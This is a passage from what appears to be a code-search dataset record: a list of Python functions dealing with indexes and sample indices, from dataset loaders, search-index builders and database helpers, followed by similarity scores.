the main index \n self._index[w][fname]= findex", "def __getitem__(self, index: int) -> AnnotatedData:\n # 
sample selection\n selected_sample = self.df.iloc[index]\n return self._make_return_tuple(selected_sample)", "def generate_index(self):\n begin_o, end_o, begin_a, end_a = 0, 0, 0, 0\n for obs_space, act_space in zip(self.env.observation_space, self.env.action_space):\n end_o = end_o + obs_space.shape[0]\n if isinstance(act_space, Box):\n end_a = act_space.shape[0]\n else:\n end_a = act_space.n\n range_o = (begin_o, end_o)\n range_a = (begin_a, end_a)\n self.observation_index.append(range_o)\n self.action_index.append(range_a)\n begin_o = end_o\n begin_a = end_a", "def add_type_index(self, sample):\n sample['item_type_index'] = types.get_index_of_type(sample['item_type'])", "def init_index(self, index_name):\n return Index(self, index_name)", "def getIndividual2ColIndex(cls, header, col_name2index, sampleStartingColumn=9):\n\t\tsys.stderr.write(\"Finding all individuals ...\")\n\t\tno_of_cols = len(header)\n\t\tindividual_name2col_index = {}\t#individual's column name -> an opened file handler to store genetic data\n\t\tcounter = 0\n\t\tfor i in xrange(sampleStartingColumn, no_of_cols):\n\t\t\tindividualName = header[i]\n\t\t\tcol_index = col_name2index.get(individualName)\n\t\t\tif not individualName:\t#ignore empty column\n\t\t\t\tcontinue\n\t\t\tif individualName[:-4]=='.bam':\n\t\t\t\tindividualCode = individualName[:-4]\t#get rid of .bam\n\t\t\telse:\n\t\t\t\tindividualCode = individualName\n\t\t\tindividual_name2col_index[individualCode] = col_index\n\t\t\tcounter += 1\n\t\tsys.stderr.write(\"%s individuals added. Done.\\n\"%(counter))\n\t\treturn individual_name2col_index", "def index(self):\n path = self.path.format('index')\n \n with open(path, 'r', newline='') as file:\n l = list(csv.reader(file))\n \n index = [v for _ in l for v in _]\n index = dict((v, i) for (i, v) in enumerate(index))\n \n return index", "def _initIndexes(self):\n class Record:\n \"\"\" a moron simple object for carrying the 'extra'-payload to index\n constructors\n \"\"\"\n def __init__(self, **kw):\n self.__dict__.update(kw)\n\n addIndex = self.addIndex\n addColumn = self.addColumn\n\n # Content indexes\n self._catalog.indexes.clear()\n for (index_name, index_type, extra) in self.enumerateIndexes():\n if extra is None:\n addIndex( index_name, index_type)\n else:\n if isinstance(extra, StringTypes):\n p = Record(indexed_attrs=extra)\n elif isinstance(extra, DictType):\n p = Record(**extra)\n else:\n p = Record()\n addIndex( index_name, index_type, extra=p )\n\n # Cached metadata\n self._catalog.names = ()\n self._catalog.schema.clear()\n for column_name in self.enumerateColumns():\n addColumn( column_name )", "def add_index(self, index):\n self.add_index_sig(IndexSignature.from_index(index))", "def add_index(self, index):\n self.add_index_sig(IndexSignature.from_index(index))", "def __generate_features_index__(self, feature_names, dictionaries):\n keys = []\n for name, dictionary in zip(feature_names, dictionaries):\n features = []\n for feature in dictionary.keys():\n if dictionary.get(feature) > self._cutoff:\n features.append((name, feature))\n self.feature_freq[name] += 1\n keys.extend(features)\n for i in range(len(keys)):\n self._features_index[keys[i]] = i\n self.features_list = tuple(keys)\n self._features_vector_length = len(keys)", "def _generate_sample_indices(random_state, n_samples):\n random_instance = check_random_state(random_state)\n sample_indices = random_instance.randint(0, n_samples, n_samples)\n\n return sample_indices", "def make_idx_data(docs, ncand=30, skip=False):\n X, y, indices, 
ent_ids = [], [], [], []\n i = 0\n for doc in docs:\n doc_idx = []\n gold_ids, skip_ids = [], [] \n for mentcand in doc:\n ment_idx = []\n flag = False\n tX, ty, tids = [], [], []\n for entcand in mentcand[1][:ncand]:\n tX.append(entcand[1])\n ty.append(entcand[0][1])\n if ty[-1] == 1: flag = True\n tids.append(entcand[0][0])\n ment_idx.append(i)\n i += 1\n if skip and not flag:\n i = len(y)\n continue\n else:\n X += tX\n y += ty\n ent_ids += tids\n if len(ment_idx) > 0: \n doc_idx.append(ment_idx)\n gold_ids.append(mentcand[0][-1])\n else: # must be a false negative\n skip_ids.append(mentcand[0][-1]) \n if len(doc_idx) > 0: \n # append skip_ids after gold_ids, in order to properly evaluate\n # note len(doc_idx) != len(gold_ids+skip_ids)\n indices.append((doc_idx, gold_ids+skip_ids))\n X = np.array(X, dtype='float32')\n y = np.array(y, dtype='int')\n return X, y, indices, ent_ids", "def from_index(cls, index):\n path, expressions, attrs = index.deconstruct()\n attrs.pop('name', None)\n attrs.pop('fields', None)\n\n return cls(attrs=attrs,\n expressions=deepcopy(expressions or None),\n fields=deepcopy(index.fields or None),\n name=index.name or None)", "def add_index(self, name, func):\n assert name not in self.indices\n info_name = 'index:%s:%s' % (self.info['name'], name)\n info = self.store._get_info(info_name, index_for=self.info['name'])\n index = Index(self, info, func)\n self.indices[name] = index\n if IndexKeyBuilder:\n self._index_keys = IndexKeyBuilder(self.indices.values()).build\n return index", "def __getitem__(self, idx):\n \n sample = {'num_atoms': self.num_atoms[idx],\\\n 'symbols': self.symbols[idx],\\\n 'charges': self.charges[idx],\\\n 'positions': self.positions[idx],\\\n 'data': self.data[int(np.floor(idx/2))]}\n\n return sample", "def build_index(self):\n self.create_index()\n logger.debug(f\"Building index with {self.n_trees} trees.\")\n\n for i in range(len(self.corpus_embeddings)):\n self.index.add_item(i, self.corpus_embeddings[i])\n self.index.build(self.n_trees)", "def get_out_idx():\n exacz = pd.read_csv(f'{home}/ref/exac/exac_zscore_mimssense+stopgain_gn_checked.txt', sep='\\t')\n exacz = exacz[['gn', 'conseq', 'exac_z', 'exac_zrank']]\n\n gdi = pd.read_csv(f'{home}/work/generisk/gdi/gdi_score_pnas_gn_checked.txt', sep=\"\\t\")\n gdi = gdi[['gn', 'gdi', 'gdi_phred_raw']]\n gdi['gdi_rank'] = 100 - round(gdi['gdi'].rank() / len(gdi.index) * 100, 2)\n\n rvis = pd.read_csv(f\"{home}/ref/rvis/rvis_lite.txt\", sep='\\t')\n\n out_idx = pd.merge(exacz, gdi, on='gn', how='outer')\n out_idx = pd.merge(out_idx, rvis, on='gn', how='outer')\n\n # merge with omim\n omim = pd.read_csv(f\"{home}/ref/omim/omim_dedup.tsv\", sep='\\t', usecols='gn,inher'.split(\",\"))\n out_idx = pd.merge(out_idx, omim, on='gn', how='left')\n out_idx['inher'] = out_idx['inher'].fillna('na')\n\n # 18090\n out_idx = out_idx.loc[out_idx.conseq == 'missense_variant'].drop('conseq', axis=1)\n\n out_idx.to_pickle(f'{home}/gr/final/out_idx.pk')\n\n return out_idx", "def createIndivitual(self) -> Dict[str, Any]:\n ind = {\n \"genome\": {\n key: numpy.random.randint(0, len(value), size=self.ref_count[key]) for (\n key, value) in self.grammar.items()\n },\n \"fitness\": None,\n \"fenotype\": None,\n }\n return ind", "def build(self):\n\t\tself.documents = self.get_items_to_index()\n\t\tself.build_index()", "def get_samples_index(options):\n sys.stderr.write(\"reading list of individuals from %s\\n\" % \n options.samples)\n \n f = open(options.samples)\n\n ind_dict = {}\n \n idx = 0\n for line in f:\n words 
= line.rstrip().split()\n\n # name = words[0].replace(\"NA\", \"\")\n name = words[0]\n\n if name in ind_dict:\n raise ValueError(\"sample identifier '%s' appears multiple \"\n \"times in file %s\" % (name, options.samples))\n \n ind_dict[name] = idx\n \n idx += 1\n\n return ind_dict", "def build_index_groups(train):\n nz_row, nz_col = train.nonzero()\n nz_train = list(zip(nz_row, nz_col))\n\n grouped_nz_train_byrow = group_by(nz_train, index=0)\n nz_row_colindices = [(g, np.array([v[1] for v in value]))\n for g, value in grouped_nz_train_byrow]\n\n grouped_nz_train_bycol = group_by(nz_train, index=1)\n nz_col_rowindices = [(g, np.array([v[0] for v in value]))\n for g, value in grouped_nz_train_bycol]\n return nz_train, nz_row_colindices, nz_col_rowindices", "def table_key(self, reindex_dict):\n reindexed_marks = []\n for m in self.component1.marks:\n new_m = reindex_dict.get(m)\n if new_m == None:\n if len(reindex_dict) == 0:\n new_m = 0\n else:\n new_m = max(reindex_dict.values())+1\n reindex_dict[m] = new_m\n reindexed_marks.append(new_m)\n return tuple( [self.component1.genus] + sorted(reindexed_marks) )", "def _get_indices_from_payload(self):\n for _, value in self.s_namespaces.items():\n for index in value['indexes'].items():\n yield index", "def _get_table_from_samples(self, index):\n df = pd.DataFrame()\n for sample in self.samples:\n sd = sample.to_dict()\n ser = pd.Series(\n {k: v for (k, v) in list(sd.items()) if not k.startswith(\"_\")}\n )\n df = df.append(ser, ignore_index=True)\n index = [index] if isinstance(index, str) else index\n if not all([i in df.columns for i in index]):\n _LOGGER.debug(\n \"Could not set {} index. At least one of the \"\n \"requested columns does not exist: {}\".\n format(CFG_SAMPLE_TABLE_KEY, index))\n return df\n _LOGGER.debug(\"Setting sample_table index to: {}\".format(index))\n df.set_index(keys=index, drop=False, inplace=True)\n return df", "def indices(\n index_group: Literal[\"all\"] | str | IndexGroup | Sequence[str],\n ignore_error: bool = False,\n **kwargs,\n) -> Dataset:\n indices = _get_indices_of_group(index_group)\n out = None\n if \"out_file\" in kwargs.keys():\n out = kwargs[\"out_file\"]\n del kwargs[\"out_file\"]\n acc = []\n for i in indices:\n log.info(f\"Computing index '{i.short_name}'\")\n kwargs[\"index_name\"] = i.short_name\n if ignore_error:\n try:\n res = index(**kwargs)\n if \"percentiles\" in res.coords:\n res = res.rename({\"percentiles\": i.short_name + \"_percentiles\"})\n if \"thresholds\" in res.coords:\n res = res.rename({\"thresholds\": i.short_name + \"_thresholds\"})\n acc.append(res)\n except Exception:\n warn(f\"Could not compute {i.short_name}.\")\n else:\n res = index(**kwargs)\n if \"percentiles\" in res.coords:\n res = res.rename({\"percentiles\": i.short_name + \"_percentiles\"})\n if \"thresholds\" in res.coords:\n res = res.rename({\"thresholds\": i.short_name + \"_thresholds\"})\n acc.append(res)\n ds: Dataset = xr.merge(acc)\n if out is not None:\n _write_output_file(\n result_ds=ds,\n input_time_encoding=ds.time.encoding,\n netcdf_version=kwargs.get(\"netcdf_version\", NetcdfVersionRegistry.NETCDF4),\n file_path=out,\n )\n return ds", "def id_to_index(self, id):\n raise NotImplementedError", "def _generate_bagging_indices(random_state, bootstrap_features,\n bootstrap_samples, n_features, n_samples,\n max_features, max_samples):\n # Get valid random state\n random_state = check_random_state(random_state)\n\n # Draw indices\n feature_indices = _generate_indices(random_state, bootstrap_features,\n 
n_features, max_features)\n sample_indices = _generate_indices(random_state, bootstrap_samples,\n n_samples, max_samples)\n\n return feature_indices, sample_indices", "def __init__(self, index=None):\n self.index = index or {}", "def createIndex(self):\n\n super(COCO_PLUS, self).createIndex()\n catNameToId = dict()\n pointclouds = dict()\n imgToPc = dict()\n\n if 'pointclouds' in self.dataset:\n for pc in self.dataset['pointclouds']:\n imgToPc[pc['img_id']] = pc\n pointclouds[pc['id']] = pc\n\n if 'categories' in self.dataset:\n for cat in self.dataset['categories']:\n catNameToId[cat['name']] = cat['id']\n\n self.catNameToId = catNameToId\n self.pointclouds = pointclouds\n self.imgToPc = imgToPc\n self.logger.info('index created.')", "def get_transcript_gene_map(db_path, table=Annotation.__tablename__, index_col='TranscriptId'):\n df = read_attrs(db_path, table, index_col)\n return dict(list(zip(df.index, df.GeneId)))", "def index_id(i):\n return f\"(i={i})\"", "def build_index(self):\n\t\tix = self.create_index()\n\t\twriter = AsyncWriter(ix)\n\n\t\tfor i, document in enumerate(self.documents):\n\t\t\tif document:\n\t\t\t\twriter.add_document(**document)\n\t\t\tupdate_progress_bar(\"Building Index\", i, len(self.documents))\n\n\t\twriter.commit(optimize=True)", "def init_index(clear=False):\n return _run_indexer_func(\"init_index\", clear)", "def index(self):\n return dict(data='index')", "def _index_document(index_list):\n if isinstance(index_list, abc.Mapping):\n raise TypeError(\"passing a dict to sort/create_index/hint is not \"\n \"allowed - use a list of tuples instead. did you \"\n \"mean %r?\" % list(index_list.items()))\n elif not isinstance(index_list, (list, tuple)):\n raise TypeError(\"must use a list of (key, direction) pairs, \"\n \"not: \" + repr(index_list))\n if not len(index_list):\n raise ValueError(\"key_or_list must not be the empty list\")\n\n index = SON()\n for (key, value) in index_list:\n if not isinstance(key, str):\n raise TypeError(\"first item in each key pair must be a string\")\n if not isinstance(value, (str, int, abc.Mapping)):\n raise TypeError(\"second item in each key pair must be 1, -1, \"\n \"'2d', 'geoHaystack', or another valid MongoDB \"\n \"index specifier.\")\n index[key] = value\n return index", "def __getitem__(self, index: list) -> (np.array, np.array):\n # Generate indexes of the batch\n indexes = self.indexes[index * self.batch_size:(index + 1) * self.batch_size]\n\n # Find list of IDs\n list_IDs_temp = [self.list_IDs[k] for k in indexes]\n\n # Generate data\n X, M = self.__data_generation(list_IDs_temp)\n\n return X, M", "def to_flat_index(self) -> Index: # type: ignore[override]\n return Index(self._values, tupleize_cols=False)", "def __index_data_body(index, doc_type, doc_id, source):\n\n index_data = {\n \"_index\": index,\n \"_type\": doc_type,\n \"_id\": doc_id,\n \"_source\": source\n }\n\n return index_data", "def get_agg(self, x, ids):\n \n for i in range(batch_size):\n sample_size = (ids == i).sum()\n sample_agg = torch.mean(x[ids == i], 0).repeat(sample_size, 1)\n \n # concatenate each group of aggregated data\n if i == 0:\n agg = sample_agg \n else:\n agg = torch.cat((agg, sample_agg), dim=0)\n \n return agg", "def profile_index(func, args, kwargs, func_result):\n collection = args[0]\n\n report_kvs = _profile_query(collection)\n\n if len(args) > 1:\n report_kvs['Index'] = _to_json(args[1])\n\n return report_kvs", "def _make_index_list(self, used_sample_id_list, num_id_repeats=1):\n if used_sample_id_list is None:\n 
self.index_list = [i for i in range(self.data.shape[0])]\n\n else:\n self.index_list = [i for i in range(self.data.shape[0])\n if self.data[i][DATA_ID_INDEX] in used_sample_id_list\n ]\n\n if len(self.index_list) != len(used_sample_id_list):\n warnings.warn(\"Not all images found. \\\n Found: {}, requested: {}\".format(len(self.index_list),\n len(used_sample_id_list))\n )\n\n # for small datasets,\n # the ids can be repeated to get a reasonable batch size working\n self.index_list = self.index_list*num_id_repeats", "def indexRecords(self,indexTypes):\n indexed = self.indexed = {}\n for type in indexTypes:\n indexed[type] = {}\n for record in self.records:\n type = record.name\n if type in indexTypes:\n indexed[type][record.getId().lower()] = record", "def master_ndindex(self): # itermaster_indices(self):\n return itertools_product(\n *[range(*r) for r in self.location]\n ) # TODO check", "def compute_idx(pos, edge_index):\n\n pos_i = pos[edge_index[0]]\n pos_j = pos[edge_index[1]]\n\n d_ij = torch.norm(abs(pos_j - pos_i), dim=-1, keepdim=False).unsqueeze(-1) + 1e-5\n v_ji = (pos_i - pos_j) / d_ij\n\n unique, counts = torch.unique(\n edge_index[0], sorted=True, return_counts=True\n ) # Get central values\n full_index = (\n torch.arange(0, edge_index[0].size()[0]).cuda().int()\n ) # init full index\n\n # Compute 1\n repeat = torch.repeat_interleave(counts, counts)\n counts_repeat1 = torch.repeat_interleave(full_index, repeat) # 0,...,0,1,...,1,...\n\n # Compute 2\n split = torch.split(full_index, counts.tolist()) # split full index\n index2 = list(edge_index[0].data.cpu().numpy()) # get repeat index\n counts_repeat2 = torch.cat(itemgetter(*index2)(split), dim=0) # 0,1,2,...,0,1,2,..\n\n # Compute angle embeddings\n v1 = v_ji[counts_repeat1.long()]\n v2 = v_ji[counts_repeat2.long()]\n\n angle = (v1 * v2).sum(-1).unsqueeze(-1)\n angle = torch.clamp(angle, min=-1.0, max=1.0) + 1e-6 + 1.0\n\n return counts_repeat1.long(), counts_repeat2.long(), angle", "def _create_img_id_to_idx(self):\n with h5py.File(self.image_features_path, 'r') as features_file:\n coco_ids = features_file['ids'][()]\n coco_id_to_index = {id: i for i, id in enumerate(coco_ids)}\n return coco_id_to_index", "def index(self, *index):\n # .index() resets\n s = self._clone()\n if not index:\n s._index = None\n else:\n s._index = (self._index or []) + list(index)\n return s", "def insert_index(self):\n pass" ]
[ "0.6321686", "0.6155408", "0.60595196", "0.6051188", "0.59505635", "0.5836034", "0.5680135", "0.56531954", "0.5625771", "0.55557144", "0.5533098", "0.5517968", "0.5480308", "0.54524577", "0.54428107", "0.5442492", "0.5433063", "0.543244", "0.54272753", "0.54136074", "0.5409224", "0.54080087", "0.5389681", "0.53872", "0.53553134", "0.5351346", "0.53475285", "0.53452975", "0.53425384", "0.5337408", "0.53231746", "0.5289884", "0.528622", "0.5283764", "0.52781904", "0.5266295", "0.52521867", "0.5240203", "0.52371854", "0.5233222", "0.5229196", "0.52276045", "0.5221925", "0.5198369", "0.5185744", "0.5179887", "0.5172686", "0.5163934", "0.5146914", "0.5144823", "0.5138248", "0.51120514", "0.5111487", "0.51065975", "0.51033133", "0.5099613", "0.50958437", "0.50933844", "0.509236", "0.50913835", "0.5090005", "0.5090005", "0.50835896", "0.5077599", "0.5077438", "0.50699127", "0.5066628", "0.50626117", "0.5047522", "0.50473917", "0.5043177", "0.5040927", "0.50362474", "0.50281453", "0.5020047", "0.50041395", "0.50005203", "0.4983874", "0.4970982", "0.49657524", "0.4961032", "0.49557218", "0.49443734", "0.49402243", "0.4939011", "0.49384806", "0.49368602", "0.49319717", "0.4931955", "0.4926997", "0.49070683", "0.49037737", "0.48971233", "0.48963112", "0.4895887", "0.48926276", "0.48782703", "0.4874228", "0.4861559", "0.48573104" ]
0.64187765
0
Create a library_size text file. Calculate the 75th-percentile expression and the sum of expression for each sample and write them into output_fp.
def create_libsize(expr_distr_fp, output_fp, sample, debug=False):
    sample_expr_distr = pa.parquet.read_table(expr_distr_fp['path']).to_pandas()
    libsize_count = pd.DataFrame({'sample': sample_expr_distr.columns[1:],
                                  'libsize_75percent': np.percentile(sample_expr_distr.iloc[:, 1:], 75, axis=0),
                                  'libsize_total_count': np.sum(sample_expr_distr.iloc[:, 1:], axis=0)},
                                 index=None)
    df_libsize = pd.DataFrame(libsize_count)
    if os.path.isfile(output_fp):
        previous_libsize = pd.read_csv(output_fp, sep='\t')
        df_libsize = pd.concat([previous_libsize, df_libsize], axis=0).drop_duplicates(subset=['sample'], keep='last')
    df_libsize.to_csv(output_fp, sep='\t', index=False)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def make_libfile():\n # wfc3_obsmodes_uvis\n wfc3_uvis = [\n \"f218w\",\n \"f225w\",\n \"f275w\",\n \"f336w\",\n \"f390m\",\n \"f390w\",\n \"f410m\",\n \"f438w\",\n \"f467m\",\n \"f475w\",\n \"f547m\",\n \"f555w\",\n \"f606w\",\n \"f621m\",\n \"f625w\",\n \"f689m\",\n \"f763m\",\n \"f775w\",\n \"f814w\",\n \"f845m\",\n ]\n\n wfc3_ir = [\n \"f098m\",\n \"f105w\",\n \"f110w\",\n \"f125w\",\n \"f127m\",\n \"f139m\",\n \"f140w\",\n \"f153m\",\n \"f160w\",\n ]\n\n wfpc2 = [\n \"f122m\",\n \"f157w\",\n \"f336w\",\n \"f410m\",\n \"f467m\",\n \"f547m\",\n \"f439w\",\n \"f569w\",\n \"f675w\",\n \"f791w\",\n \"f170w\",\n \"f185w\",\n \"f218w\",\n \"f255w\",\n \"f300w\",\n \"f380w\",\n \"f555w\",\n \"f622w\",\n \"f450w\",\n \"f606w\",\n \"f702w\",\n \"f814w\",\n ]\n\n acs_wfc = [\n \"f435w\",\n \"f475w\",\n \"f550m\",\n \"f555w\",\n \"f606w\",\n \"f625w\",\n \"f775w\",\n \"f814w\",\n ]\n # galex\n galex = [\"fuv\", \"nuv\"]\n\n # Open hd5 file for writing\n hf = h5py.File(__ROOT__ + \"filters.hd5\", \"w\")\n\n # Create group for nice hierarchical structure\n f = hf.create_group(\"filters\")\n\n # Define arrays for \"contents\" / descriptive information\n tablenames = []\n observatories = []\n instruments = []\n names = []\n norms = []\n cwaves = []\n pwaves = []\n comments = []\n\n # Loop through WFC3_UVIS filters\n for filt in wfc3_uvis:\n\n # define uvis 1 and uvis2 modes\n mode_1 = \"wfc3, uvis1, \" + filt\n mode_2 = \"wfc3, uvis2, \" + filt\n\n # pull bandpasses from stsynphot for the two uvis modes\n bp_1 = stsyn.band(mode_1)\n bp_2 = stsyn.band(mode_2)\n\n # extract the wavelength array\n wave = bp_1.waveset\n\n # compute the average bandpass between uvis1 and uvis2\n bp_avg = np.average([bp_1(wave), bp_2(wave)], axis=0)\n\n # define the filter name\n filter_name = \"HST_WFC3_\" + filt.upper()\n\n # build array of wavelength and throughput\n arr = np.array(\n list(zip(wave.value.astype(np.float64), bp_avg.astype(np.float64))),\n dtype=[(\"WAVELENGTH\", \"float64\"), (\"THROUGHPUT\", \"float64\")],\n )\n\n # append dataset to the hdf5 filters group\n f.create_dataset(filter_name, data=arr)\n\n # generate filter instance to compute relevant info\n newfilt = phot.Filter(wave, bp_avg, name=filt.upper())\n\n # populate contents lists with relevant information\n tablenames.append(filter_name)\n observatories.append(\"HST\")\n instruments.append(\"WFC3\")\n names.append(newfilt.name)\n norms.append(newfilt.norm.value)\n cwaves.append(newfilt.cl.value)\n pwaves.append(newfilt.lpivot.value)\n comments.append(\"avg of uvis1 and uvis2\")\n\n # Loop through WFC3_IR filters\n for filt in wfc3_ir:\n\n # define ir mode\n mode = \"wfc3, ir, \" + filt\n\n # pull bandpasses from stsynphot for the two uvis modes\n bp = stsyn.band(mode)\n\n # extract the wavelength array\n wave = bp.waveset\n\n # define the filter name\n filter_name = \"HST_WFC3_\" + filt.upper()\n\n # build array of wavelength and throughput\n arr = np.array(\n list(zip(wave.value.astype(np.float64), bp(wave).astype(np.float64))),\n dtype=[(\"WAVELENGTH\", \"float64\"), (\"THROUGHPUT\", \"float64\")],\n )\n\n # append dataset to the hdf5 filters group\n f.create_dataset(filter_name, data=arr)\n\n # generate filter instance to compute relevant info\n newfilt = phot.Filter(wave, bp(wave), name=filt.upper())\n\n # populate contents lists with relevant information\n tablenames.append(filter_name)\n observatories.append(\"HST\")\n instruments.append(\"WFC3\")\n names.append(newfilt.name)\n norms.append(newfilt.norm.value)\n 
cwaves.append(newfilt.cl.value)\n pwaves.append(newfilt.lpivot.value)\n comments.append(\"\")\n\n # Loop through WFPC2 filters\n for filt in wfpc2:\n\n # define chips 1, 2, 3, 4 modes\n mode_1 = \"wfpc2, 1, \" + filt\n mode_2 = \"wfpc2, 2, \" + filt\n mode_3 = \"wfpc2, 3, \" + filt\n mode_4 = \"wfpc2, 4, \" + filt\n\n # pull bandpasses from stsynphot for the two uvis modes\n bp_1 = stsyn.band(mode_1)\n bp_2 = stsyn.band(mode_2)\n bp_3 = stsyn.band(mode_3)\n bp_4 = stsyn.band(mode_4)\n\n # extract the wavelength array\n wave = bp_1.waveset\n\n # compute the average bandpass between uvis1 and uvis2\n bp_avg = np.average([bp_1(wave), bp_2(wave), bp_3(wave), bp_4(wave)], axis=0)\n\n # define the filter name\n filter_name = \"HST_WFPC2_\" + filt.upper()\n\n # build array of wavelength and throughput\n arr = np.array(\n list(zip(wave.value.astype(np.float64), bp_avg.astype(np.float64))),\n dtype=[(\"WAVELENGTH\", \"float64\"), (\"THROUGHPUT\", \"float64\")],\n )\n\n # append dataset to the hdf5 filters group\n f.create_dataset(filter_name, data=arr)\n\n # generate filter instance to compute relevant info\n newfilt = phot.Filter(wave, bp_avg, name=filt.upper())\n\n # populate contents lists with relevant information\n tablenames.append(filter_name)\n observatories.append(\"HST\")\n instruments.append(\"WFPC2\")\n names.append(newfilt.name)\n norms.append(newfilt.norm.value)\n cwaves.append(newfilt.cl.value)\n pwaves.append(newfilt.lpivot.value)\n comments.append(\"avg of 1, 2, 3, 4\")\n\n # Loop through ACS filters\n for filt in acs_wfc:\n\n # define wfc1, wfc2 modes\n mode_1 = \"acs, wfc1, \" + filt\n mode_2 = \"acs, wfc2, \" + filt\n\n # pull bandpasses from stsynphot for the two uvis modes\n bp_1 = stsyn.band(mode_1)\n bp_2 = stsyn.band(mode_2)\n\n # extract the wavelength array\n wave = bp_1.waveset\n\n # compute the average bandpass between uvis1 and uvis2\n bp_avg = np.average([bp_1(wave), bp_2(wave)], axis=0)\n\n # define the filter name\n filter_name = \"HST_ACS_WFC_\" + filt.upper()\n\n # build array of wavelength and throughput\n arr = np.array(\n list(zip(wave.value.astype(np.float64), bp_avg.astype(np.float64))),\n dtype=[(\"WAVELENGTH\", \"float64\"), (\"THROUGHPUT\", \"float64\")],\n )\n\n # append dataset to the hdf5 filters group\n f.create_dataset(filter_name, data=arr)\n\n # generate filter instance to compute relevant info\n newfilt = phot.Filter(wave, bp_avg, name=filt.upper())\n\n # populate contents lists with relevant information\n tablenames.append(filter_name)\n observatories.append(\"HST\")\n instruments.append(\"ACS_WFC\")\n names.append(newfilt.name)\n norms.append(newfilt.norm.value)\n cwaves.append(newfilt.cl.value)\n pwaves.append(newfilt.lpivot.value)\n comments.append(\"avg of wfc1 and wfc2\")\n\n # Loop through GALEX filters:\n for filt in galex:\n # define ir mode\n mode = \"galex,\" + filt\n\n # pull bandpasses from stsynphot for the two uvis modes\n bp = stsyn.band(mode)\n\n # extract the wavelength array\n wave = bp.waveset\n\n # define the filter name\n filter_name = \"GALEX_\" + filt.upper()\n\n # build array of wavelength and throughput\n arr = np.array(\n list(zip(wave.value.astype(np.float64), bp(wave).astype(np.float64))),\n dtype=[(\"WAVELENGTH\", \"float64\"), (\"THROUGHPUT\", \"float64\")],\n )\n\n # append dataset to the hdf5 filters group\n f.create_dataset(filter_name, data=arr)\n\n # generate filter instance to compute relevant info\n newfilt = phot.Filter(wave, bp(wave), name=filt.upper())\n\n # populate contents lists with relevant 
information\n tablenames.append(filter_name)\n observatories.append(\"GALEX\")\n instruments.append(\"GALEX\")\n names.append(newfilt.name)\n norms.append(newfilt.norm.value)\n cwaves.append(newfilt.cl.value)\n pwaves.append(newfilt.lpivot.value)\n comments.append(\"\")\n\n # smash the contents arrays together\n contents = np.array(\n list(\n zip(\n tablenames,\n observatories,\n instruments,\n names,\n norms,\n cwaves,\n pwaves,\n comments,\n )\n ),\n dtype=[\n (\"TABLENAME\", \"S40\"),\n (\"OBSERVATORY\", \"S30\"),\n (\"INSTRUMENT\", \"S30\"),\n (\"NAME\", \"S10\"),\n (\"NORM\", \"<f8\"),\n (\"CWAVE\", \"<f8\"),\n (\"PWAVE\", \"<f8\"),\n (\"COMMENT\", \"S100\"),\n ],\n )\n\n # add the contents array as an hd5 dataset\n hf.create_dataset(\"content\", data=contents)\n\n # close the file\n hf.close()", "def outputFiles(self, filesizelist):\n self.outputs = filesizelist\n self.outputSize = reduce(lambda x,y: x + y[1], filesizelist, 0)", "def _prepare_input_file(self, filename, numlines, maxvalue):\n with open(filename, 'a') as f:\n for _ in range(numlines):\n f.write(str(randrange(maxvalue)) + '\\n')\n self.filepath = f.name", "def make_bedfiles():\n df = pd.read_csv(\"%s.length\" % ref, sep='\\t', header=None)\n thresh = math.ceil(sum(df[1]) / globals()['jobs_per_pool'])\n lines = []\n fcount = 0\n fsum = 0\n for count,row in enumerate(df.index):\n contig, length = list(df.loc[row, :])\n fsum += length\n lines.append([contig, str(length)])\n if fsum >= thresh or count + 1 == len(df.index):\n make_bedfile(lines, fcount)\n lines = []\n fcount += 1\n fsum = 0\n return fcount", "def get_size_factor(samples, lib_file_path):\n libs = np.loadtxt(lib_file_path, dtype='str', skiprows=1, delimiter='\\t')\n a, b = np.where(samples[:, np.newaxis] == libs[:, 0])\n assert np.all(libs[b, 0] == samples)\n libs = libs[b, :]\n med = np.median(libs[:, 1].astype('float'))\n sf = med / libs[:, 1].astype('float')\n return sf", "def combine(args, library_sizes):\n with open(args.counts, \"r\") as counts, open(args.results, \"r\") as results:\n with open(args.output_dir + \"counts_results.txt\", \"w+\") as file1, \\\n open(args.output_dir + \"counts_results_rpm.txt\",\"w+\") \\\n as file2, \\\n open(args.output_dir + \"counts_results_rpkm.txt\", \"w+\") \\\n as file3:\n head = True\n for count_line, results_line in zip(counts, results):\n count_line = count_line.strip()\n results_line = results_line.strip()\n\n if head: # Process column names into one header\n head = False\n count_head_parts = count_line.split(\"\\t\")\n results_head_parts = results_line.split(\"\\t\")\n results_head_parts = [\"Chromosome\", \"Start\", \"End\"] + \\\n results_head_parts[1:]\n\n new_head_parts = results_head_parts + \\\n count_head_parts[2:]\n new_head = \"\\t\".join(new_head_parts)\n new_head += \"\\n\"\n file1.write(new_head)\n file2.write(new_head)\n file3.write(new_head)\n\n else:\n process(count_line, results_line,\n file1, file2, file3, library_sizes)", "def file_write(sp_length, sp_period, header, file_name):\n \n #specify filename and inform write\n out_file = open(file_name, \"w\")\n \n #add headers to file from list\n print(\"{0:>15}\".format(header[0]) ,\\\n \"{0:>15}\".format(header[1]) ,\\\n \"{0:>15}\".format(header[2]), file = out_file)\n \n #add data to file form lists \n for i in range(len(sp_length)):\n print(\"{0:>15}\".format(i) ,\\\n \"{0:>15.3f}\".format(sp_length[i]) ,\\\n \"{0:>15.3f}\".format(sp_period[i]), file = out_file)\n \n #close the file\n out_file.close()", "def onestatfile():\n with 
hp.File('StatsFile.h5', 'w') as onefile:\n alldata = np.empty((600, 4, 3, 500), dtype=np.float32)\n for j in range(600):\n for i in range(3):\n msd, vol, rms, asp = getstats(i, j+1)\n alldata[j, 0, i, :] = msd\n alldata[j, 1, i, :] = vol\n alldata[j, 2, i, :] = rms\n alldata[j, 3, i, :] = asp\n onefile.create_dataset('Stats', data=alldata, chunks=(1, 4, 3, 500),\n compression='gzip', compression_opts=9)", "def make_stats_files(sample_dc, otu_dc, degree_counts, num_con_cat, num_con,\r\n num_cat, cat_by_sample, dir_path):\r\n output = open(os.path.join(dir_path,\r\n \"stats/real_dc_sample_degree.txt\"), 'w')\r\n sample_dc_out = sorted(sample_dc.items())\r\n sample_dc_str = '\\n'.join(['\\t'.join(map(str, t)) for t in sample_dc_out])\r\n output.write(''.join([\"# Just Sample degree counts\\n\",\r\n \"Degree\tSample Count\\n\", sample_dc_str]))\r\n output.close()\r\n\r\n output = open(os.path.join(dir_path,\r\n \"stats/real_dc_otu_degree.txt\"), 'w')\r\n otu_dc_out = sorted(otu_dc.items())\r\n otu_dc_str = 